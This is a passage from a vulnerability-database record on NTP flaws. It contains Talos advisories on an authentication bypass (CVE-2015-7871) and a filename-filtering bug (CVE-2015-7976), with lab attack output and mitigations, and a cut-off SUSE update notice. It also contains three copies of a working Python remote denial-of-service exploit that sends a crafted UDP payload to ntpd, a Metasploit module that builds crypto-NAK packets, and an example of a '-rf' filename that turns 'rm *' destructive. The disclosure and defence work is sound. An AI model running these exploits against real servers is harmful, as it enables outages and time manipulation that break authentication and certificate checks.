This causes the first check for unauthenticated packets sent by non standards compliant clients to fail. The second check (is_authentic == AUTH_ERROR) only matches packets that contain a bad digest. As a result, crypto-NAK packets avoid both early termination conditions and proceed through to code which creates a new ephemeral association authenticated under the keyid specified by the packet, in this case keyid == 0. This has interesting implications when we consider how authentication is enforced.\n\nntpd can communicate simultaneously with both authenticated and unauthenticated peers. ntpd indicates the authentication requirements for an association by storing the id of the required authentication key in the \u201ckeyid\u201d variable of the peer association structure. The special keyid value 0 indicates that no authentication is required. By default, when a packet is received from a peer with an active association, ntpd requires the packet to be authenticated only if the association requires authentication. This check is governed by the following code.\n \n \n /* From ntp_proto.c */\n \n \n /*\n * If the digest fails or it's missing for authenticated\n * associations, the client cannot authenticate a server\n * reply to a client packet previously sent. The loopback check\n * is designed to avoid a bait-and-switch attack, which was\n * possible in past versions. If symmetric modes, return a\n * crypto-NAK. The peer should restart the protocol.\n */\n } else if (!AUTH(peer->keyid || has_mac ||\n (restrict_mask & RES_DONTTRUST), is_authentic)) {\n report_event(PEVNT_AUTH, peer, \"digest\");\n peer->flash |= TEST5; /* bad auth */\n peer->badauth++;\n if (has_mac &&\n (hismode == MODE_ACTIVE || hismode == MODE_PASSIVE))\n fast_xmit(rbufp, MODE_ACTIVE, 0, restrict_mask);\n ...\n return;\n }\n \n\nLet us consider what happens to subsequent unauthenticated packets sent after an attacker sends a crypto-NAK. Because the association is configured with keyid 0, peer->keyid == 0. For unauthenticated packets has_mac == 0. As long as the sender is not subject to a \u201cnotrust\u201d restriction, the first parameter of the AUTH() macro will be zero indicating that unauthenticated packets are permissible. Since is_authentic == AUTH_NONE for unauthenticated packets, AUTH() will return true, the guard will be false, and the packet will proceed to further processing. As long as the packet passes all the other consistency checks that can be met by any consistent NTP peer, it will be processed for time. If there are a majority of mutually-consistent attacking peers advertising the incorrect time, they can win the clock selection algorithm and cause the victim to accept their time.\n\n##### Attack Scenario\n\nLets look at an attack in action. We can monitor the attack progress by querying the victim for the status of its peer associations using the \u201cntpq -c lpeer\u201d command. As the attack progresses, we\u2019ll see how the victim\u2019s peer status changes. Initially, the victim is configured with 5 upstream servers, server1-5:\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 2 64 77 61.985 -5.808 4.378\n +server2 192.168.99.2 2 u 66 64 37 87.387 -9.879 6.186\n *server3 .ACTS. 1 u 65 64 37 83.949 -9.816 6.583\n +server4 192.168.99.2 2 u 62 64 37 54.822 -7.868 4.310\n +server5 192.168.99.5 3 u 62 64 37 103.997 -5.807 4.369\n \n\nSix attacking nodes (attacker1-6) send symmetric active crypto-NAK packets to the victim causing the victim to establish ephemeral peer associations with the attacking nodes:\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 54 64 377 59.255 4.625 7.393\n +server2 192.168.99.2 2 u 51 64 377 83.354 0.156 7.140\n *server3 .ACTS. 1 u 48 64 373 86.698 2.518 10.006\n +server4 192.168.99.2 2 u 49 64 377 52.071 1.726 8.939\n +server5 192.168.99.5 2 u 47 64 377 101.751 3.860 8.142\n attacker1 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker2 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker3 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker4 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker5 .INIT. 16 S - 64 0 0.000 0.000 0.000\n attacker6 .INIT. 16 S - 64 0 0.000 0.000 0.000\n \n\nIn this attack, the attackers consistently advertise time that is 5 minutes behind true time. Because the time provided by the attackers is consistent and they outnumber the legitimate servers, ntpd eventually declares the legitimate servers to be falsetickers and chooses an attacker node as the chosen peer.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xserver1 192.168.99.1 2 u 32 64 377 57.873 1.455 5.495\n xserver2 192.168.99.2 2 u 27 64 377 84.543 -1.815 6.012\n xserver3 .ACTS. 1 u 25 64 367 92.528 -4.774 6.641\n xserver4 192.168.99.2 2 u 25 64 377 90.991 -22.040 18.962\n xserver5 192.168.99.5 2 u 25 64 377 98.811 0.776 6.355\n -attacker1 192.168.33.9 2 S 25 64 1 0.310 -300432 0.000\n +attacker2 192.168.33.9 2 S 1 64 1 1.210 -300432 0.000\n -attacker3 192.168.33.9 2 S 34 64 1 0.567 -300433 0.000\n -attacker4 192.168.33.9 2 S 10 64 1 15.753 -300417 0.000\n +attacker5 192.168.33.9 2 S 5 64 1 0.396 -300431 0.000\n *attacker6 192.168.33.9 2 S 22 64 1 0.258 -300432 0.000\n \n\nEventually the victim steps its clock to match the attacker-provided time and resets its associations.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n +server1 192.168.99.1 2 u 1 64 1 58.073 300425. 0.000\n +server2 192.168.99.2 2 u - 64 1 85.505 300424. 1.201\n *server3 .ACTS. 1 u 1 64 1 84.131 300423. 1.182\n server4 192.168.99.2 2 u 1 64 1 51.920 300425. 0.000\n -server5 192.168.99.5 2 u 2 64 1 98.141 300425. 0.737\n attacker1 .STEP. 16 S 276 64 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 159 64 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 407 64 0 0.000 0.000 0.000\n attacker4 .STEP. 16 S 176 64 0 0.000 0.000 0.000\n attacker5 .STEP. 16 S 95 64 0 0.000 0.000 0.000\n attacker6 .STEP. 16 S 75 64 0 0.000 0.000 0.000\n \n\nOnce the victim has stepped its clock, the attackers win the election to become the chosen peers. They can maintain the system\u2019s clock at the offset time or make further changes.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xserver1 192.168.99.1 2 u 52 64 1 67.141 300424. 6.354\n xserver2 192.168.99.2 2 u 52 64 1 88.428 300424. 0.888\n xserver3 .ACTS. 1 u 53 64 1 107.698 300415. 12.255\n xserver4 192.168.99.2 2 u 51 64 1 67.562 300419. 5.143\n xserver5 192.168.99.5 2 u 56 64 1 101.432 300427. 1.491\n *attacker1 192.168.33.9 2 S 29 64 2 1.853 3.464 0.000\n -attacker2 192.168.33.9 2 S 10 64 3 0.102 5.735 3.579\n -attacker3 192.168.33.9 2 S 35 64 2 1.733 1.986 0.000\n -attacker4 192.168.33.9 2 S 10 64 3 0.205 5.640 2.975\n +attacker5 192.168.33.9 2 S 9 64 3 1.172 4.657 2.598\n +attacker6 192.168.33.9 2 S 24 64 2 2.516 4.041 0.000\n \n\nIn this example attack, we have only stepped the clock by 5 minutes. However, we have achieved larger offsets in lab testing. We are not aware of any limitations that would prevent attackers from stepping the clock by significantly greater values nor are we aware of limitations to prevent attackers from executing multiple successive steps to move the victim\u2019s system time arbitrarily from the initial time.\n\n##### Mitigation\n\nAttempts to exploit this vulnerability are detected by the following IDS rules:\n \n \n * Snort - SID 36536\n \n\nThe most complete mitigation is to upgrade to ntp-4.2.8p4. ntp-4.2.8p4 fixes a number of other critical issues in addition to this vulnerability. If your system\u2019s ntpd is packaged by the system vendor, apply your vendor\u2019s security update as soon as it becomes available. Until then, the best defense is to use firewall rules to block malicious traffic.\n\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or the Uncomplicated Firewall on Linux, you should enable it.\n\nFor other systems, appropriate firewall rules will depend on your environment. Use the following recommendations as a guideline for typical client-server and peer modes:\n\n * NTP clients should block incoming NTP packets from any system that is not a known, legitimate peer\n * NTP servers (and systems that must allow incoming ephemeral peer connections) should block incoming symmetric active (NTP mode 1) crypto-NAK packets\n\nIn environments where authentication has been configured between all NTP clients, servers, and peers, ntpd can be prevented from communicating with unauthenticated peers by enabling the ntpd \u201cnotrust\u201d restriction. This does not prevent an attacker from causing the ephemeral peer association to be created. However, even with malicious peer associations active, ntpd should reject packets sent by those the malicious peers. The \u201cnotrust\u201d restriction can be enabled by adding it to ntpd\u2019s default restriction lists:\n \n \n restrict -4 default kod notrap nomodify nopeer noquery notrust\n restrict -6 default kod notrap nomodify nopeer noquery notrust\n \n\nIf there are known-good peer connections that cannot be authenticated, the \u201cnotrust\u201d restriction can be selectively relaxed for those peers only as follows:\n \n \n server ntp.mydomain.local\n restrict ntp.mydomain.local kod notrap nomodify nopeer noquery\n \n\n### Further Discussion\n\n##### Impact\n\nMalicious changes system time can have grave implications in a number of systems. With the ability to change system time, an attacker may be able to:\n\n * Authenticate via expired passwords and accounts\n * Cause TLS clients to accept expired and revoked certificates and to reject currently valid certificates\n * Circumvent modern web security mitigations such as certificate pinning and HTTP Strict Transport Security\n * Deny service to authentication systems such as Kerberos, Active Directory, and other systems that use time-limited authentication tickets such as web services\n * Force caching systems such as DNS and CDNs to flush their caches resulting in significant system performance degradation\n * Damage real-time and cyber-physical systems\n\n##### Am I Vulnerable?\n\nThis vulnerability has been confirmed in ntp version 4.2.8p3. The vulnerable code path was introduced in ntp version 4.2.5p186 (late 2009). Therefore, all ntp-4 stable releases from 4.2.5p186 through 4.2.8p3 appear to be vulnerable. All ntp-4 development versions from 4.3.0 through, at least, 4.3.76 also appear to be vulnerable.\n\nAny product which integrates an ntpd version from the vulnerable range may also be affected. Because many vendors patch ntpd before packaging it for distribution in their products, the susceptibility of any specific product must be considered on a per-product basis.\n\nThe Cisco Product Security Incident Response Team (PSIRT) is currently investigating the susceptibility of Cisco products to the vulnerabilities disclosed with ntp-4.2.8p4. A Cisco Security Advisory should be posted shortly:\n\n[http://tools.cisco.com/security/center/publicationListing.x](<https://tools.cisco.com/security/center/publicationListing.x>)\n\nPlease refer to the Cisco Security Vulnerability Policy for further information about vulnerability response:\n\n[http://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html](<https://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html>)\n\n##### Is Configuration X Vulnerable?\n\nIf an attacker can send symmetric active crypto-NAK packets to your ntpd process and can receive responses back, then you are vulnerable unless your ntpd is configured to reject unauthenticated packets from unknown peers (e.g. \u201crestrict default notrust \u2026\u201d). In a lab environment, we have successfully attacked:\n\n * Stratum 1 servers with attached refclocks\n * Clients configured with a single server\n * Clients in typical configurations with 4 servers from the NTP Pool Project and one fallback server\n\n##### How Do I Know If I\u2019m Being Attacked?\n\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your /etc/ntp.conf file could indicate an attack:\n \n \n $ ntpq -c lpeer\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server 10.0.0.1 2 u 257 256 377 1.388 3.174 2.315\n 192.168.33.254 .INIT. 16 u - 1024 0 0.000 0.000 0.000\n \n\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\n\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: 36536.\n\nMore generally, reception of unsolicited crypto-NAKs that are not in response to a packet originated by the recipient may indicate an attack.\n\n##### Where Can I Find More Information?\n\n * ntp.org Security Notices: <http://support.ntp.org/bin/view/Main/SecurityNotice>\n * Details of vulnerabilities fixed by ntp-4.2.8p4 that were found by other researchers \n * Cisco Talos: <http://talosintel.com/vulnerability-reports/>\n * Boston University: [http://www.cs.bu.edu/~goldbe/NTPattack.html](<https://www.cs.bu.edu/~goldbe/NTPattack.html>)\n * ntp.org Security Bug #2941: <https://bugs.ntp.org/show_bug.cgi?id=2941>\n * Cisco Security Advisories and Responses: [http://tools.cisco.com/security/center/publicationListing.x](<https://tools.cisco.com/security/center/publicationListing.x>)\n * Cisco Security Vulnerability Policy: [http://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html](<https://www.cisco.com/web/about/security/psirt/security_vulnerability_policy.html>)\n\n##### Timeline\n\n2015-10-07 - Vendor Disclosure \n2015-10-21 - Public Release\n\n##### Credit\n\nMatthew Van Gundy of Cisco ASIG\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2015-0129\n\nPrevious Report\n\nTALOS-2015-0065\n", "edition": 19, "modified": "2015-10-21T00:00:00", "published": "2015-10-21T00:00:00", "id": "TALOS-2015-0069", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2015-0069", "title": "NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-01T21:24:54", "bulletinFamily": "info", "cvelist": ["CVE-2015-7976"], "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0073\n\n## Network Time Protocol ntpq Special Character Filtering Vulnerability\n\n##### January 19, 2016\n\n##### CVE Number\n\nCVE-2015-7976\n\n### Summary\n\nThe ntpq saveconfig command does not do adequate filtering of special characters from the supplied filename. Only back slash and forward slash are currently filtered out. There are other special characters that are allowed in the filename which can cause issues during globbing.\n\nIn addition to special characters that are passed straight through to the filename, strftime() is called on format specifiers defined by the ntpq user. The %n and %t format specifiers insert a newline and a tab, respectively, into the filename. These could have unintended consequences during globbing as well.\n\nNote that the ntpq user is required to authenticate to run this command.\n\n### Tested Versions\n\nntp 4.2.8p3 \nNTPsec aa48d001683e5b791a743ec9c575aaf7d867a2b0c\n\n### Product URLs\n\n<http://www.ntp.org> \n<http://www.ntpsec.org/>\n\n### CVSS Score\n\nCVSSv2: 3.6 - AV:N/AC:H/Au:S/C:N/I:P/A:P \nCVSSv3: 4.4 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L\n\n### Details\n\nFor instance, dash can be the first character in a filename. So if the ntpq user saves the config to a file named \u201c-rf\u201d, an admin on the ntp server could run \u201crm *\u201d in the directory holding that file and the command would really be \u201crm -rf *\u201d after globbing. This is an extreme and unlikely example, but there are any number of similar issues that could occur with commands an admin would likely run with wildcards from the config directory.\n\n### Recommended Fix\n\nThe save_config() function in ntp_control.c should filter out special characters with the exception of a small number that normally get used in filenames: ._- (dot, underscore, and dash). Filenames should not be allowed to start with these special characters. Also, the %n and %t format specifiers should be disallowed to avoid whitespace in a filename. A more conservative approach would be to completely remove the call to strftime() in case there are other vulnerabilities with strftime() that could be exploited by an ntpq user.\n\n### Timeline\n\n2015-10-07 - Vendor Disclosure \n2016-01-19 - Public Release\n\n##### Credit\n\nJonathan Gardner\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0074\n\nPrevious Report\n\nTALOS-2016-0072\n", "edition": 11, "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "TALOS-2016-0073", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0073", "title": "Network Time Protocol ntpq Special Character Filtering Vulnerability", "type": "talos", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-11-28T21:23:41", "description": "NTP 4.2.8p3 - Denial of Service. CVE-2015-7855. Dos exploit for Linux platform", "published": "2016-11-28T00:00:00", "type": "exploitdb", "title": "NTP 4.2.8p3 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7855"], "modified": "2016-11-28T00:00:00", "id": "EDB-ID:40840", "href": "https://www.exploit-db.com/exploits/40840/", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: ntpd 4.2.8p3 remote DoS\r\n# Date: 2015-10-21\r\n# Bug Discovery: John D \"Doug\" Birdwell\r\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\r\n# Website: http://support.ntp.org/bin/view/Main/NtpBug2922\r\n# Vendor Homepage: http://www.ntp.org/\r\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz\r\n# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77\r\n# CVE: CVE-2015-7855\r\n\r\nimport sys\r\nimport socket\r\n\r\nif len(sys.argv) != 3:\r\n print \"usage: \" + sys.argv[0] + \" <host> <port>\"\r\n sys.exit(-1)\r\n\r\npayload = \"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x6e\\x6f\\x6e\\x63\\x65\\x3d\\x64\\x61\\x33\\x64\\x35\\x64\\x30\\x66\\x66\\x38\\x30\\x38\\x31\\x65\\x63\\x38\\x33\\x35\\x32\\x61\\x32\\x32\\x38\\x36\\x2c\\x20\\x66\\x72\\x61\\x67\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x3d\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\"\r\n\r\nprint \"[-] Sending payload to \" + sys.argv[1] + \":\" + sys.argv[2] + \" ...\"\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], int(sys.argv[2])))\r\nprint \"[+] Done!\"\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40840/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nNTP 4.2.8p3 - Denial of Service", "edition": 1, "published": "2016-11-28T00:00:00", "title": "NTP 4.2.8p3 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7855"], "modified": "2016-11-28T00:00:00", "id": "EXPLOITPACK:C0EA9468AC06752131FCBEB9976AF6EC", "href": "", "sourceData": "#!/usr/bin/env python\n\n# Exploit Title: ntpd 4.2.8p3 remote DoS\n# Date: 2015-10-21\n# Bug Discovery: John D \"Doug\" Birdwell\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\n# Website: http://support.ntp.org/bin/view/Main/NtpBug2922\n# Vendor Homepage: http://www.ntp.org/\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz\n# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77\n# CVE: CVE-2015-7855\n\nimport sys\nimport socket\n\nif len(sys.argv) != 3:\n print \"usage: \" + sys.argv[0] + \" <host> <port>\"\n sys.exit(-1)\n\npayload = \"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x6e\\x6f\\x6e\\x63\\x65\\x3d\\x64\\x61\\x33\\x64\\x35\\x64\\x30\\x66\\x66\\x38\\x30\\x38\\x31\\x65\\x63\\x38\\x33\\x35\\x32\\x61\\x32\\x32\\x38\\x36\\x2c\\x20\\x66\\x72\\x61\\x67\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x3d\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\"\n\nprint \"[-] Sending payload to \" + sys.argv[1] + \":\" + sys.argv[2] + \" ...\"\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], int(sys.argv[2])))\nprint \"[+] Done!\"", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:23", "description": "", "published": "2016-11-25T00:00:00", "type": "packetstorm", "title": "NTP 4.2.8p3 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7855"], "modified": "2016-11-25T00:00:00", "id": "PACKETSTORM:139925", "href": "https://packetstormsecurity.com/files/139925/NTP-4.2.8p3-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/env python \n \n# Exploit Title: ntpd 4.2.8p3 remote DoS \n# Date: 2015-10-21 \n# Bug Discovery: John D \"Doug\" Birdwell \n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) \n# Website: http://support.ntp.org/bin/view/Main/NtpBug2922 \n# Vendor Homepage: http://www.ntp.org/ \n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz \n# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77 \n# CVE: CVE-2015-7855 \n \nimport sys \nimport socket \n \nif len(sys.argv) != 3: \nprint \"usage: \" + sys.argv[0] + \" <host> <port>\" \nsys.exit(-1) \n \npayload = \"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x6e\\x6f\\x6e\\x63\\x65\\x3d\\x64\\x61\\x33\\x64\\x35\\x64\\x30\\x66\\x66\\x38\\x30\\x38\\x31\\x65\\x63\\x38\\x33\\x35\\x32\\x61\\x32\\x32\\x38\\x36\\x2c\\x20\\x66\\x72\\x61\\x67\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x3d\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\" \n \nprint \"[-] Sending payload to \" + sys.argv[1] + \":\" + sys.argv[2] + \" ...\" \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) \nprint \"[+] Done!\" \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/139925/ntp428p3-dos.txt"}], "metasploit": [{"lastseen": "2020-07-15T20:53:29", "description": "Crypto-NAK packets can be used to cause ntpd to accept time from unauthenticated ephemeral symmetric peers by bypassing the authentication required to mobilize peer associations. This module sends these Crypto-NAK packets in order to establish an association between the target ntpd instance and the attacking client. The end goal is to cause ntpd to declare the legitimate peers \"false tickers\" and choose the attacking clients as the preferred peers, allowing these peers to control time.\n", "published": "2015-10-28T01:10:07", "type": "metasploit", "title": "NTP \"NAK to the Future\"", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7871"], "modified": "2019-03-05T19:04:49", "id": "MSF:AUXILIARY/SCANNER/NTP/NTP_NAK_TO_THE_FUTURE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Udp\n include Msf::Auxiliary::NTP\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'NTP \"NAK to the Future\"',\n 'Description' => %q(\n Crypto-NAK packets can be used to cause ntpd to accept time from\n unauthenticated ephemeral symmetric peers by bypassing the\n authentication required to mobilize peer associations. This module\n sends these Crypto-NAK packets in order to establish an association\n between the target ntpd instance and the attacking client. The end goal\n is to cause ntpd to declare the legitimate peers \"false tickers\" and\n choose the attacking clients as the preferred peers, allowing\n these peers to control time.\n ),\n 'Author' =>\n [\n 'Matthew Van Gundy of Cisco ASIG', # vulnerability discovery\n 'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],\n [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],\n [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],\n [ 'CVE', '2015-7871' ]\n ]\n )\n )\n\n register_options(\n [\n OptInt.new('OFFSET', [true, \"Offset from local time, in seconds\", 300])\n ])\n end\n\n def build_crypto_nak(time)\n probe = Rex::Proto::NTP::NTPSymmetric.new\n probe.stratum = 1\n probe.poll = 10\n probe.mode = 1\n unless time\n now = Time.now\n # compute the timestamp. NTP stores a timestamp as 64-bit unsigned\n # integer, the high 32-bits representing the number of seconds since era\n # epoch and the low 32-bits representing the fraction of a second. The era\n # epoch in this case is Jan 1 1900, so we must add the number of seconds\n # between then and the ruby era epoch, Jan 1 1970, which is 2208988800\n time = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec\n end\n\n # TODO: use different values for each?\n probe.reference_timestamp = time\n probe.origin_timestamp = time\n probe.receive_timestamp = time\n probe.transmit_timestamp = time\n # key-id 0\n probe.payload = \"\\x00\\x00\\x00\\x00\"\n probe\n end\n\n def check\n connect_udp\n\n # pick a random 64-bit timestamp\n canary_timestamp = rand((2**32)..((2**64) - 1))\n probe = build_crypto_nak(canary_timestamp)\n udp_sock.put(probe)\n\n expected_length = probe.to_binary_s.length - probe.payload.length\n response = udp_sock.timed_read(expected_length)\n disconnect_udp\n if response.length == expected_length\n ntp_symmetric = Rex::Proto::NTP::NTPSymmetric.new.read(response)\n if ntp_symmetric.mode == 2 && ntp_symmetric.origin_timestamp == canary_timestamp\n vprint_good(\"#{rhost}:#{rport} - NTP - VULNERABLE: Accepted a NTP symmetric active association\")\n report_vuln(\n host: rhost,\n port: rport.to_i,\n proto: 'udp',\n sname: 'ntp',\n name: 'NTP \"NAK to the Future\"',\n info: 'Accepted an NTP symmetric active association by replying with a symmetric passive request',\n refs: references\n )\n return Exploit::CheckCode::Appears\n end\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def run_host(_ip)\n check\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb"}], "suse": [{"lastseen": "2016-09-04T12:27:22", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7703", "CVE-2015-8140", "CVE-2015-8138", "CVE-2015-7855", "CVE-2015-7973", "CVE-2015-7977", "CVE-2015-8158", "CVE-2015-7704", "CVE-2015-7979", "CVE-2015-7701", "CVE-2015-7976", "CVE-2015-7848", "CVE-2015-8139", "CVE-2015-7975", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-7974", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7978", "CVE-2015-7853"], "description": "ntp was updated to version 4.2.8p6 to fix 28 security issues.\n\n Major functional changes:\n - The "sntp" commandline tool changed its option handling in a major way,\n some options have been renamed or dropped.\n - "controlkey 1" is added during update to ntp.conf to allow sntp to work.\n - The local clock is being disabled during update.\n - ntpd is no longer running chrooted.\n\n Other functional changes:\n - ntp-signd is installed.\n - "enable mode7" can be added to the configuration to allow ntdpc to work\n as compatibility mode option.\n - "kod" was removed from the default restrictions.\n - SHA1 keys are used by default instead of MD5 keys.\n\n Also yast2-ntp-client was updated to match some sntp syntax changes.\n (bsc#937837)\n\n These security issues were fixed:\n - CVE-2015-8158: Fixed potential infinite loop in ntpq (bsc#962966).\n - CVE-2015-8138: Zero Origin Timestamp Bypass (bsc#963002).\n - CVE-2015-7979: Off-path Denial of Service (DoS) attack on authenticated\n broadcast mode (bsc#962784).\n - CVE-2015-7978: Stack exhaustion in recursive traversal of restriction\n list (bsc#963000).\n - CVE-2015-7977: reslist NULL pointer dereference (bsc#962970).\n - CVE-2015-7976: ntpq saveconfig command allows dangerous characters in\n filenames (bsc#962802).\n - CVE-2015-7975: nextvar() missing length check (bsc#962988).\n - CVE-2015-7974: Skeleton Key: Missing key check allows impersonation\n between authenticated peers (bsc#962960).\n - CVE-2015-7973: Replay attack on authenticated broadcast mode\n (bsc#962995).\n - CVE-2015-8140: ntpq vulnerable to replay attacks (bsc#962994).\n - CVE-2015-8139: Origin Leak: 